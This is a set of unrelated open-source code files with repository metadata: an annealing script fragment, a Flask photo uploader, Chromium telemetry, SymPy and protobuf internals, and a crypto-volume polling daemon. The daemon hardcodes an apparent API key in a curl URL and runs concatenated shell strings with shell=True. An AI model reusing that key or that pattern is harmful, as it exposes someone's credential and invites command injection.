else: T = linear_temperature(i) randomize_model3(best_model, i) i_score = build_score_pdb_model3(i) stats_append(3,i,i_score) score_diff = i_score - best_dfire_score if score_diff > 0: #print("score diff", score_diff) score_diff = score_diff if score_diff < 5*T else 5*T prob_to_accept = math.exp(-100*score_diff/T) print("probability to accept:", prob_to_accept) if prob_to_accept < random.random(): #print("probability not enough") continue print("accepting some randomness") #print("scoring") #if i_score < best_dfire_score: best_dfire_score = i_score best_dfire_number = i old_model_number = i #save best stats_append(3000,best_dfire_number,best_dfire_score) print "best model found:", best_dfire_number, "score:", best_dfire_score if __name__ == "__main__": main()
gpl-2.0
eikevons/yorik-photos
photos/upload.py
1
5164
## ## Copyright (c) 2014 Jan Eike von Seggern ## import os from os import path from shutil import copyfileobj, move, rmtree from multiprocessing.dummy import Pool from io import IOBase from hashlib import md5 from datetime import datetime from PIL import Image from . import photo_storage from .application import app thumb_width = int(app.config['THUMB_WIDTH']) def md5hex(fd, block_size=2**10): dig = md5() buf = fd.read(block_size) while buf: dig.update(buf) buf = fd.read(block_size) return dig.hexdigest() def prepare_photo(outdir, thumbdir, fin, filename): print('loading', filename, 'to', outdir, 'from', fin) fin.seek(0) chksum = md5hex(fin) impath = path.join(outdir, chksum) if path.exists(impath): raise IOError("Output file '{0}' already exists".format(impath)) thumbpath = path.join(thumbdir, chksum) if path.exists(thumbpath): raise IOError("Thumbnail file '{0}' already exists".format(impath)) print(filename, 'files ok') # Copy image to `outdir` fin.seek(0) with open(impath, 'wb') as fout: copyfileobj(fin, fout) print(filename, 'copied') # Get date fin.seek(0) im = Image.open(fin) dt = get_exifdate(im) print(filename, 'datetime:', dt) # Create thumbnail print(filename, 'creating thumbnail...') try: im.thumbnail((thumb_width, thumb_width), Image.ANTIALIAS) im.save(thumbpath, 'JPEG') except Exception as e: print('XXX', e) raise e print(filename, 'thumbnail saved') r = {'chksum': chksum, 'date': dt, 'filename': filename} print(filename, '->', r) return r def rotate_photo(chksum, direction): if direction == "right": angle = -90 else: angle = 90 for thumb in (True, False): p = photo_storage.path(chksum, thumb) im = Image.open(p) im = im.rotate(angle) im.save(p, 'JPEG') DATETIMEKEY = 0x0132 # copied from PIL.ExifTags def get_exifdate(im): if isinstance(im, (str, IOBase)): im = Image.open(im) exif = im._getexif() if DATETIMEKEY in exif: dt = datetime.strptime(exif[DATETIMEKEY], '%Y:%m:%d %H:%M:%S') else: dt = datetime.utcnow() return dt class UploadSession: def 
__init__(self, sessionid, load=None): self.sessionid = sessionid self.outdir = path.join(app.config.get('TMPDIR', '/tmp'), sessionid) self.thumbdir = path.join(self.outdir, '{0}'.format(thumb_width)) self.pool = Pool() self.images = {} if load == 'load': self.__load() elif load == 'create': self.__create() elif load is not None: raise ValueError('load must be "load", "create" or None') def __create(self): if path.exists(self.outdir): raise IOError('Output directory \'{0}\' exists'.format(self.outdir)) os.mkdir(self.outdir, 0o0700) os.mkdir(self.thumbdir, 0o0700) def __load(self): if not path.exists(self.outdir) or not path.exists(self.thumbdir): raise IOError('Output directory \'{0}\' or \'{1}\' does not exist'.format(self.outdir, self.thumbdir)) print('loading upload session {0} from {1} ...'.format(self.sessionid, self.outdir)) for name in os.listdir(self.outdir): fp = path.join(self.outdir, name) if not path.isfile(fp): print(' skipping file \'{0}\''.format(name)) continue print('loading file \'{0}\' to session {1}'.format(name, self.sessionid)) self.images[name] = {'date': get_exifdate(fp), 'filename': name} def get_remote_file(self, fd, filename): print('submitting', fd, filename,' to pool') self.pool.apply_async(prepare_photo, (self.outdir, self.thumbdir, fd, filename), callback=self.__handle_result) def finish_uploads(self): self.pool.close() self.pool.join() def __handle_result(self, result): print('handle_result', result) chksum = result.pop('chksum') self.images[chksum] = result def image_path(self, chksum, thumb): if thumb: return path.join(self.thumbdir, chksum) else: return path.join(self.outdir, chksum) def dbimport(self, table): added = datetime.utcnow() for chksum, d in self.images.items(): date = d['date'] comment = d['comment'] move(self.image_path(chksum, False), photo_storage.path(chksum, False)) move(self.image_path(chksum, True), photo_storage.path(chksum, True)) table.create(chksum=chksum, date=date, added=added, comment=comment, 
mimetype='image/jpeg') def clear(self): if path.exists(self.outdir): rmtree(self.outdir) self.outdir = None if path.exists(self.thumbdir): rmtree(self.thumbdir) self.thumbdir = None self.images.clear()
mit
rbaindourov/v8-inspector
Source/chrome/tools/telemetry/telemetry/web_perf/metrics/rendering_frame.py
39
3109
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from collections import defaultdict from telemetry.timeline import bounds from telemetry.timeline import slice as slice_module class MissingData(Exception): pass class NoBeginFrameIdException(Exception): pass class RenderingFrame(object): """Object with information about the triggering of a BeginMainFrame event.""" send_begin_frame_event = 'ThreadProxy::ScheduledActionSendBeginMainFrame' begin_main_frame_event = 'ThreadProxy::BeginMainFrame' def __init__(self, events): all_send_begin_frame_events = [e for e in events if e.name == self.send_begin_frame_event] if len(all_send_begin_frame_events) != 1: raise MissingData('There must be at exactly one %s event.' % self.send_begin_frame_event) all_begin_main_frame_events = [e for e in events if e.name == self.begin_main_frame_event] if not all_begin_main_frame_events: raise MissingData('There must be at least one %s event.' 
% self.begin_main_frame_event) all_begin_main_frame_events.sort(key=lambda e: e.start) self._send_begin_frame = all_send_begin_frame_events[0] self._begin_main_frame = all_begin_main_frame_events[-1] self._bounds = bounds.Bounds() self._bounds.AddEvent(self._begin_main_frame) self._bounds.AddEvent(self._send_begin_frame) @staticmethod def IsEventUseful(event): return event.name in [RenderingFrame.send_begin_frame_event, RenderingFrame.begin_main_frame_event] @property def bounds(self): return self._bounds @property def queueing_duration(self): return self._begin_main_frame.start - self._send_begin_frame.start def GetFrameEventsInsideRange(renderer_process, timeline_range): """Returns RenderingFrames for all relevant events in the timeline_range.""" # First filter all events from the renderer_process and turn them into a # dictonary of the form: # {0: [send_begin_frame, begin_main_frame, begin_main_frame], # 1: [begin_main_frame, send_begin_frame], # 2: [send_begin_frame, begin_main_frame]} begin_frame_events_by_id = defaultdict(list) for event in renderer_process.IterAllEvents( event_type_predicate=lambda t: t == slice_module.Slice, event_predicate=RenderingFrame.IsEventUseful): begin_frame_id = event.args.get('begin_frame_id', None) if begin_frame_id is None: raise NoBeginFrameIdException('Event is missing a begin_frame_id.') begin_frame_events_by_id[begin_frame_id].append(event) # Now, create RenderingFrames for events wherever possible. frames = [] for events in begin_frame_events_by_id.values(): try: frame = RenderingFrame(events) if frame.bounds.Intersects(timeline_range): frames.append(frame) except MissingData: continue frames.sort(key=lambda frame: frame.bounds.min) return frames
bsd-3-clause
saurabhjn76/sympy
sympy/physics/quantum/qexpr.py
75
14925
from __future__ import print_function, division from sympy import Expr, sympify, Symbol, Matrix from sympy.printing.pretty.stringpict import prettyForm from sympy.core.containers import Tuple from sympy.core.compatibility import is_sequence, string_types, u from sympy.physics.quantum.dagger import Dagger from sympy.physics.quantum.matrixutils import ( numpy_ndarray, scipy_sparse_matrix, to_sympy, to_numpy, to_scipy_sparse ) __all__ = [ 'QuantumError', 'QExpr' ] #----------------------------------------------------------------------------- # Error handling #----------------------------------------------------------------------------- class QuantumError(Exception): pass def _qsympify_sequence(seq): """Convert elements of a sequence to standard form. This is like sympify, but it performs special logic for arguments passed to QExpr. The following conversions are done: * (list, tuple, Tuple) => _qsympify_sequence each element and convert sequence to a Tuple. * basestring => Symbol * Matrix => Matrix * other => sympify Strings are passed to Symbol, not sympify to make sure that variables like 'pi' are kept as Symbols, not the SymPy built-in number subclasses. Examples ======== >>> from sympy.physics.quantum.qexpr import _qsympify_sequence >>> _qsympify_sequence((1,2,[3,4,[1,]])) (1, 2, (3, 4, (1,))) """ return tuple(__qsympify_sequence_helper(seq)) def __qsympify_sequence_helper(seq): """ Helper function for _qsympify_sequence This function does the actual work. """ #base case. If not a list, do Sympification if not is_sequence(seq): if isinstance(seq, Matrix): return seq elif isinstance(seq, string_types): return Symbol(seq) else: return sympify(seq) # base condition, when seq is QExpr and also # is iterable. 
if isinstance(seq, QExpr): return seq #if list, recurse on each item in the list result = [__qsympify_sequence_helper(item) for item in seq] return Tuple(*result) #----------------------------------------------------------------------------- # Basic Quantum Expression from which all objects descend #----------------------------------------------------------------------------- class QExpr(Expr): """A base class for all quantum object like operators and states.""" # In sympy, slots are for instance attributes that are computed # dynamically by the __new__ method. They are not part of args, but they # derive from args. # The Hilbert space a quantum Object belongs to. __slots__ = ['hilbert_space'] is_commutative = False # The separator used in printing the label. _label_separator = u('') @property def free_symbols(self): return set([self]) def __new__(cls, *args, **old_assumptions): """Construct a new quantum object. Parameters ========== args : tuple The list of numbers or parameters that uniquely specify the quantum object. For a state, this will be its symbol or its set of quantum numbers. Examples ======== >>> from sympy.physics.quantum.qexpr import QExpr >>> q = QExpr(0) >>> q 0 >>> q.label (0,) >>> q.hilbert_space H >>> q.args (0,) >>> q.is_commutative False """ # First compute args and call Expr.__new__ to create the instance args = cls._eval_args(args) if len(args) == 0: args = cls._eval_args(tuple(cls.default_args())) inst = Expr.__new__(cls, *args, **old_assumptions) # Now set the slots on the instance inst.hilbert_space = cls._eval_hilbert_space(args) return inst @classmethod def _new_rawargs(cls, hilbert_space, *args, **old_assumptions): """Create new instance of this class with hilbert_space and args. This is used to bypass the more complex logic in the ``__new__`` method in cases where you already have the exact ``hilbert_space`` and ``args``. 
This should be used when you are positive these arguments are valid, in their final, proper form and want to optimize the creation of the object. """ obj = Expr.__new__(cls, *args, **old_assumptions) obj.hilbert_space = hilbert_space return obj #------------------------------------------------------------------------- # Properties #------------------------------------------------------------------------- @property def label(self): """The label is the unique set of identifiers for the object. Usually, this will include all of the information about the state *except* the time (in the case of time-dependent objects). This must be a tuple, rather than a Tuple. """ if len(self.args) == 0: # If there is no label specified, return the default return self._eval_args(list(self.default_args())) else: return self.args @property def is_symbolic(self): return True @classmethod def default_args(self): """If no arguments are specified, then this will return a default set of arguments to be run through the constructor. NOTE: Any classes that override this MUST return a tuple of arguments. Should be overidden by subclasses to specify the default arguments for kets and operators """ raise NotImplementedError("No default arguments for this class!") #------------------------------------------------------------------------- # _eval_* methods #------------------------------------------------------------------------- def _eval_adjoint(self): obj = Expr._eval_adjoint(self) if obj is None: obj = Expr.__new__(Dagger, self) if isinstance(obj, QExpr): obj.hilbert_space = self.hilbert_space return obj @classmethod def _eval_args(cls, args): """Process the args passed to the __new__ method. This simply runs args through _qsympify_sequence. """ return _qsympify_sequence(args) @classmethod def _eval_hilbert_space(cls, args): """Compute the Hilbert space instance from the args. 
""" from sympy.physics.quantum.hilbert import HilbertSpace return HilbertSpace() #------------------------------------------------------------------------- # Printing #------------------------------------------------------------------------- # Utilities for printing: these operate on raw sympy objects def _print_sequence(self, seq, sep, printer, *args): result = [] for item in seq: result.append(printer._print(item, *args)) return sep.join(result) def _print_sequence_pretty(self, seq, sep, printer, *args): pform = printer._print(seq[0], *args) for item in seq[1:]: pform = prettyForm(*pform.right((sep))) pform = prettyForm(*pform.right((printer._print(item, *args)))) return pform # Utilities for printing: these operate prettyForm objects def _print_subscript_pretty(self, a, b): top = prettyForm(*b.left(' '*a.width())) bot = prettyForm(*a.right(' '*b.width())) return prettyForm(binding=prettyForm.POW, *bot.below(top)) def _print_superscript_pretty(self, a, b): return a**b def _print_parens_pretty(self, pform, left='(', right=')'): return prettyForm(*pform.parens(left=left, right=right)) # Printing of labels (i.e. args) def _print_label(self, printer, *args): """Prints the label of the QExpr This method prints self.label, using self._label_separator to separate the elements. This method should not be overridden, instead, override _print_contents to change printing behavior. 
""" return self._print_sequence( self.label, self._label_separator, printer, *args ) def _print_label_repr(self, printer, *args): return self._print_sequence( self.label, ',', printer, *args ) def _print_label_pretty(self, printer, *args): return self._print_sequence_pretty( self.label, self._label_separator, printer, *args ) def _print_label_latex(self, printer, *args): return self._print_sequence( self.label, self._label_separator, printer, *args ) # Printing of contents (default to label) def _print_contents(self, printer, *args): """Printer for contents of QExpr Handles the printing of any unique identifying contents of a QExpr to print as its contents, such as any variables or quantum numbers. The default is to print the label, which is almost always the args. This should not include printing of any brackets or parenteses. """ return self._print_label(printer, *args) def _print_contents_pretty(self, printer, *args): return self._print_label_pretty(printer, *args) def _print_contents_latex(self, printer, *args): return self._print_label_latex(printer, *args) # Main printing methods def _sympystr(self, printer, *args): """Default printing behavior of QExpr objects Handles the default printing of a QExpr. To add other things to the printing of the object, such as an operator name to operators or brackets to states, the class should override the _print/_pretty/_latex functions directly and make calls to _print_contents where appropriate. This allows things like InnerProduct to easily control its printing the printing of contents. 
""" return self._print_contents(printer, *args) def _sympyrepr(self, printer, *args): classname = self.__class__.__name__ label = self._print_label_repr(printer, *args) return '%s(%s)' % (classname, label) def _pretty(self, printer, *args): pform = self._print_contents_pretty(printer, *args) return pform def _latex(self, printer, *args): return self._print_contents_latex(printer, *args) #------------------------------------------------------------------------- # Methods from Basic and Expr #------------------------------------------------------------------------- def doit(self, **kw_args): return self def _eval_rewrite(self, pattern, rule, **hints): if hints.get('deep', False): args = [ a._eval_rewrite(pattern, rule, **hints) for a in self.args ] else: args = self.args # TODO: Make Basic.rewrite use hints in evaluating # self.rule(*args, **hints), not having hints breaks spin state # (un)coupling on rewrite if pattern is None or isinstance(self, pattern): if hasattr(self, rule): rewritten = getattr(self, rule)(*args, **hints) if rewritten is not None: return rewritten return self #------------------------------------------------------------------------- # Represent #------------------------------------------------------------------------- def _represent_default_basis(self, **options): raise NotImplementedError('This object does not have a default basis') def _represent(self, **options): """Represent this object in a given basis. This method dispatches to the actual methods that perform the representation. Subclases of QExpr should define various methods to determine how the object will be represented in various bases. 
The format of these methods is:: def _represent_BasisName(self, basis, **options): Thus to define how a quantum object is represented in the basis of the operator Position, you would define:: def _represent_Position(self, basis, **options): Usually, basis object will be instances of Operator subclasses, but there is a chance we will relax this in the future to accomodate other types of basis sets that are not associated with an operator. If the ``format`` option is given it can be ("sympy", "numpy", "scipy.sparse"). This will ensure that any matrices that result from representing the object are returned in the appropriate matrix format. Parameters ========== basis : Operator The Operator whose basis functions will be used as the basis for representation. options : dict A dictionary of key/value pairs that give options and hints for the representation, such as the number of basis functions to be used. """ basis = options.pop('basis', None) if basis is None: result = self._represent_default_basis(**options) else: result = dispatch_method(self, '_represent', basis, **options) # If we get a matrix representation, convert it to the right format. 
format = options.get('format', 'sympy') result = self._format_represent(result, format) return result def _format_represent(self, result, format): if format == 'sympy' and not isinstance(result, Matrix): return to_sympy(result) elif format == 'numpy' and not isinstance(result, numpy_ndarray): return to_numpy(result) elif format == 'scipy.sparse' and \ not isinstance(result, scipy_sparse_matrix): return to_scipy_sparse(result) return result def split_commutative_parts(e): """Split into commutative and non-commutative parts.""" c_part, nc_part = e.args_cnc() c_part = list(c_part) return c_part, nc_part def split_qexpr_parts(e): """Split an expression into Expr and noncommutative QExpr parts.""" expr_part = [] qexpr_part = [] for arg in e.args: if not isinstance(arg, QExpr): expr_part.append(arg) else: qexpr_part.append(arg) return expr_part, qexpr_part def dispatch_method(self, basename, arg, **options): """Dispatch a method to the proper handlers.""" method_name = '%s_%s' % (basename, arg.__class__.__name__) if hasattr(self, method_name): f = getattr(self, method_name) # This can raise and we will allow it to propagate. result = f(arg, **options) if result is not None: return result raise NotImplementedError( "%s.%s can't handle: %r" % (self.__class__.__name__, basename, arg) )
bsd-3-clause
Evervolv/android_external_chromium_org
third_party/protobuf/python/google/protobuf/internal/containers.py
224
10004
# Protocol Buffers - Google's data interchange format # Copyright 2008 Google Inc. All rights reserved. # http://code.google.com/p/protobuf/ # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Contains container classes to represent different protocol buffer types. This file defines container classes which represent categories of protocol buffer field types which need extra maintenance. Currently these categories are: - Repeated scalar fields - These are all repeated fields which aren't composite (e.g. they are of simple types like int32, string, etc). 
- Repeated composite fields - Repeated fields which are composite. This includes groups and nested messages. """ __author__ = 'petar@google.com (Petar Petrov)' class BaseContainer(object): """Base container class.""" # Minimizes memory usage and disallows assignment to other attributes. __slots__ = ['_message_listener', '_values'] def __init__(self, message_listener): """ Args: message_listener: A MessageListener implementation. The RepeatedScalarFieldContainer will call this object's Modified() method when it is modified. """ self._message_listener = message_listener self._values = [] def __getitem__(self, key): """Retrieves item by the specified key.""" return self._values[key] def __len__(self): """Returns the number of elements in the container.""" return len(self._values) def __ne__(self, other): """Checks if another instance isn't equal to this one.""" # The concrete classes should define __eq__. return not self == other def __hash__(self): raise TypeError('unhashable object') def __repr__(self): return repr(self._values) def sort(self, *args, **kwargs): # Continue to support the old sort_function keyword argument. # This is expected to be a rare occurrence, so use LBYL to avoid # the overhead of actually catching KeyError. if 'sort_function' in kwargs: kwargs['cmp'] = kwargs.pop('sort_function') self._values.sort(*args, **kwargs) class RepeatedScalarFieldContainer(BaseContainer): """Simple, type-checked, list-like container for holding repeated scalars.""" # Disallows assignment to other attributes. __slots__ = ['_type_checker'] def __init__(self, message_listener, type_checker): """ Args: message_listener: A MessageListener implementation. The RepeatedScalarFieldContainer will call this object's Modified() method when it is modified. type_checker: A type_checkers.ValueChecker instance to run on elements inserted into this container. 
""" super(RepeatedScalarFieldContainer, self).__init__(message_listener) self._type_checker = type_checker def append(self, value): """Appends an item to the list. Similar to list.append().""" self._type_checker.CheckValue(value) self._values.append(value) if not self._message_listener.dirty: self._message_listener.Modified() def insert(self, key, value): """Inserts the item at the specified position. Similar to list.insert().""" self._type_checker.CheckValue(value) self._values.insert(key, value) if not self._message_listener.dirty: self._message_listener.Modified() def extend(self, elem_seq): """Extends by appending the given sequence. Similar to list.extend().""" if not elem_seq: return new_values = [] for elem in elem_seq: self._type_checker.CheckValue(elem) new_values.append(elem) self._values.extend(new_values) self._message_listener.Modified() def MergeFrom(self, other): """Appends the contents of another repeated field of the same type to this one. We do not check the types of the individual fields. """ self._values.extend(other._values) self._message_listener.Modified() def remove(self, elem): """Removes an item from the list. 
Similar to list.remove().""" self._values.remove(elem) self._message_listener.Modified() def __setitem__(self, key, value): """Sets the item on the specified position.""" self._type_checker.CheckValue(value) self._values[key] = value self._message_listener.Modified() def __getslice__(self, start, stop): """Retrieves the subset of items from between the specified indices.""" return self._values[start:stop] def __setslice__(self, start, stop, values): """Sets the subset of items from between the specified indices.""" new_values = [] for value in values: self._type_checker.CheckValue(value) new_values.append(value) self._values[start:stop] = new_values self._message_listener.Modified() def __delitem__(self, key): """Deletes the item at the specified position.""" del self._values[key] self._message_listener.Modified() def __delslice__(self, start, stop): """Deletes the subset of items from between the specified indices.""" del self._values[start:stop] self._message_listener.Modified() def __eq__(self, other): """Compares the current instance with another one.""" if self is other: return True # Special case for the same type which should be common and fast. if isinstance(other, self.__class__): return other._values == self._values # We are presumably comparing against some other sequence type. return other == self._values class RepeatedCompositeFieldContainer(BaseContainer): """Simple, list-like container for holding repeated composite fields.""" # Disallows assignment to other attributes. __slots__ = ['_message_descriptor'] def __init__(self, message_listener, message_descriptor): """ Note that we pass in a descriptor instead of the generated directly, since at the time we construct a _RepeatedCompositeFieldContainer we haven't yet necessarily initialized the type that will be contained in the container. Args: message_listener: A MessageListener implementation. The RepeatedCompositeFieldContainer will call this object's Modified() method when it is modified. 
message_descriptor: A Descriptor instance describing the protocol type that should be present in this container. We'll use the _concrete_class field of this descriptor when the client calls add(). """ super(RepeatedCompositeFieldContainer, self).__init__(message_listener) self._message_descriptor = message_descriptor def add(self, **kwargs): """Adds a new element at the end of the list and returns it. Keyword arguments may be used to initialize the element. """ new_element = self._message_descriptor._concrete_class(**kwargs) new_element._SetListener(self._message_listener) self._values.append(new_element) if not self._message_listener.dirty: self._message_listener.Modified() return new_element def extend(self, elem_seq): """Extends by appending the given sequence of elements of the same type as this one, copying each individual message. """ message_class = self._message_descriptor._concrete_class listener = self._message_listener values = self._values for message in elem_seq: new_element = message_class() new_element._SetListener(listener) new_element.MergeFrom(message) values.append(new_element) listener.Modified() def MergeFrom(self, other): """Appends the contents of another repeated field of the same type to this one, copying each individual message. """ self.extend(other._values) def remove(self, elem): """Removes an item from the list. 
Similar to list.remove().""" self._values.remove(elem) self._message_listener.Modified() def __getslice__(self, start, stop): """Retrieves the subset of items from between the specified indices.""" return self._values[start:stop] def __delitem__(self, key): """Deletes the item at the specified position.""" del self._values[key] self._message_listener.Modified() def __delslice__(self, start, stop): """Deletes the subset of items from between the specified indices.""" del self._values[start:stop] self._message_listener.Modified() def __eq__(self, other): """Compares the current instance with another one.""" if self is other: return True if not isinstance(other, self.__class__): raise TypeError('Can only compare repeated composite fields against ' 'other repeated composite fields.') return self._values == other._values
bsd-3-clause
thraveboy/fbbs-release
SCRIPTS/crypto_volume_daemon_cloud.py
2
1247
import subprocess import string import fileinput import json import time import sys currencies = ['BTC', 'BCC', 'ETH', 'STRAT', 'XMR', 'OMG', 'LTH', 'GNT', 'WAVES','QTUM', 'PIVX', 'SC', 'NEO', 'LTC', 'DASH', 'PAY', 'GBYTE', 'FCT', 'ETC', 'XVG'] update_rate_mins = 5 if (len(sys.argv) > 1): update_rate_mins = int(float(sys.argv[1])) while 1: json_input = subprocess.check_output("curl https://www.worldcoinindex.com/apiservice/json?key=PdEUH2ZNFMW4kaxKO1gGoFHJS", shell=True) json_decoded = json.loads(json_input) coin_values = json_decoded['Markets'] for coin in coin_values: try: coin_name = str(coin['Label'].replace("/BTC", "")) if coin_name in currencies: api_command_str = "python fbbs_api_cloud.py 'TradeVolume" + ":" + coin_name + ":" + str(update_rate_mins) + "min'" print(api_command_str) fbbs_api_obj = subprocess.check_output(api_command_str, shell=True) api_command_str = "python fbbs_api_cloud.py 'TradeVolume" + ":" + coin_name + ":" + str(update_rate_mins) + "min" + " " + str(coin['Volume_24h']) + "'" print(api_command_str) fbbs_api_obj = subprocess.check_output(api_command_str, shell=True) except: pass time.sleep(60*update_rate_mins)
gpl-3.0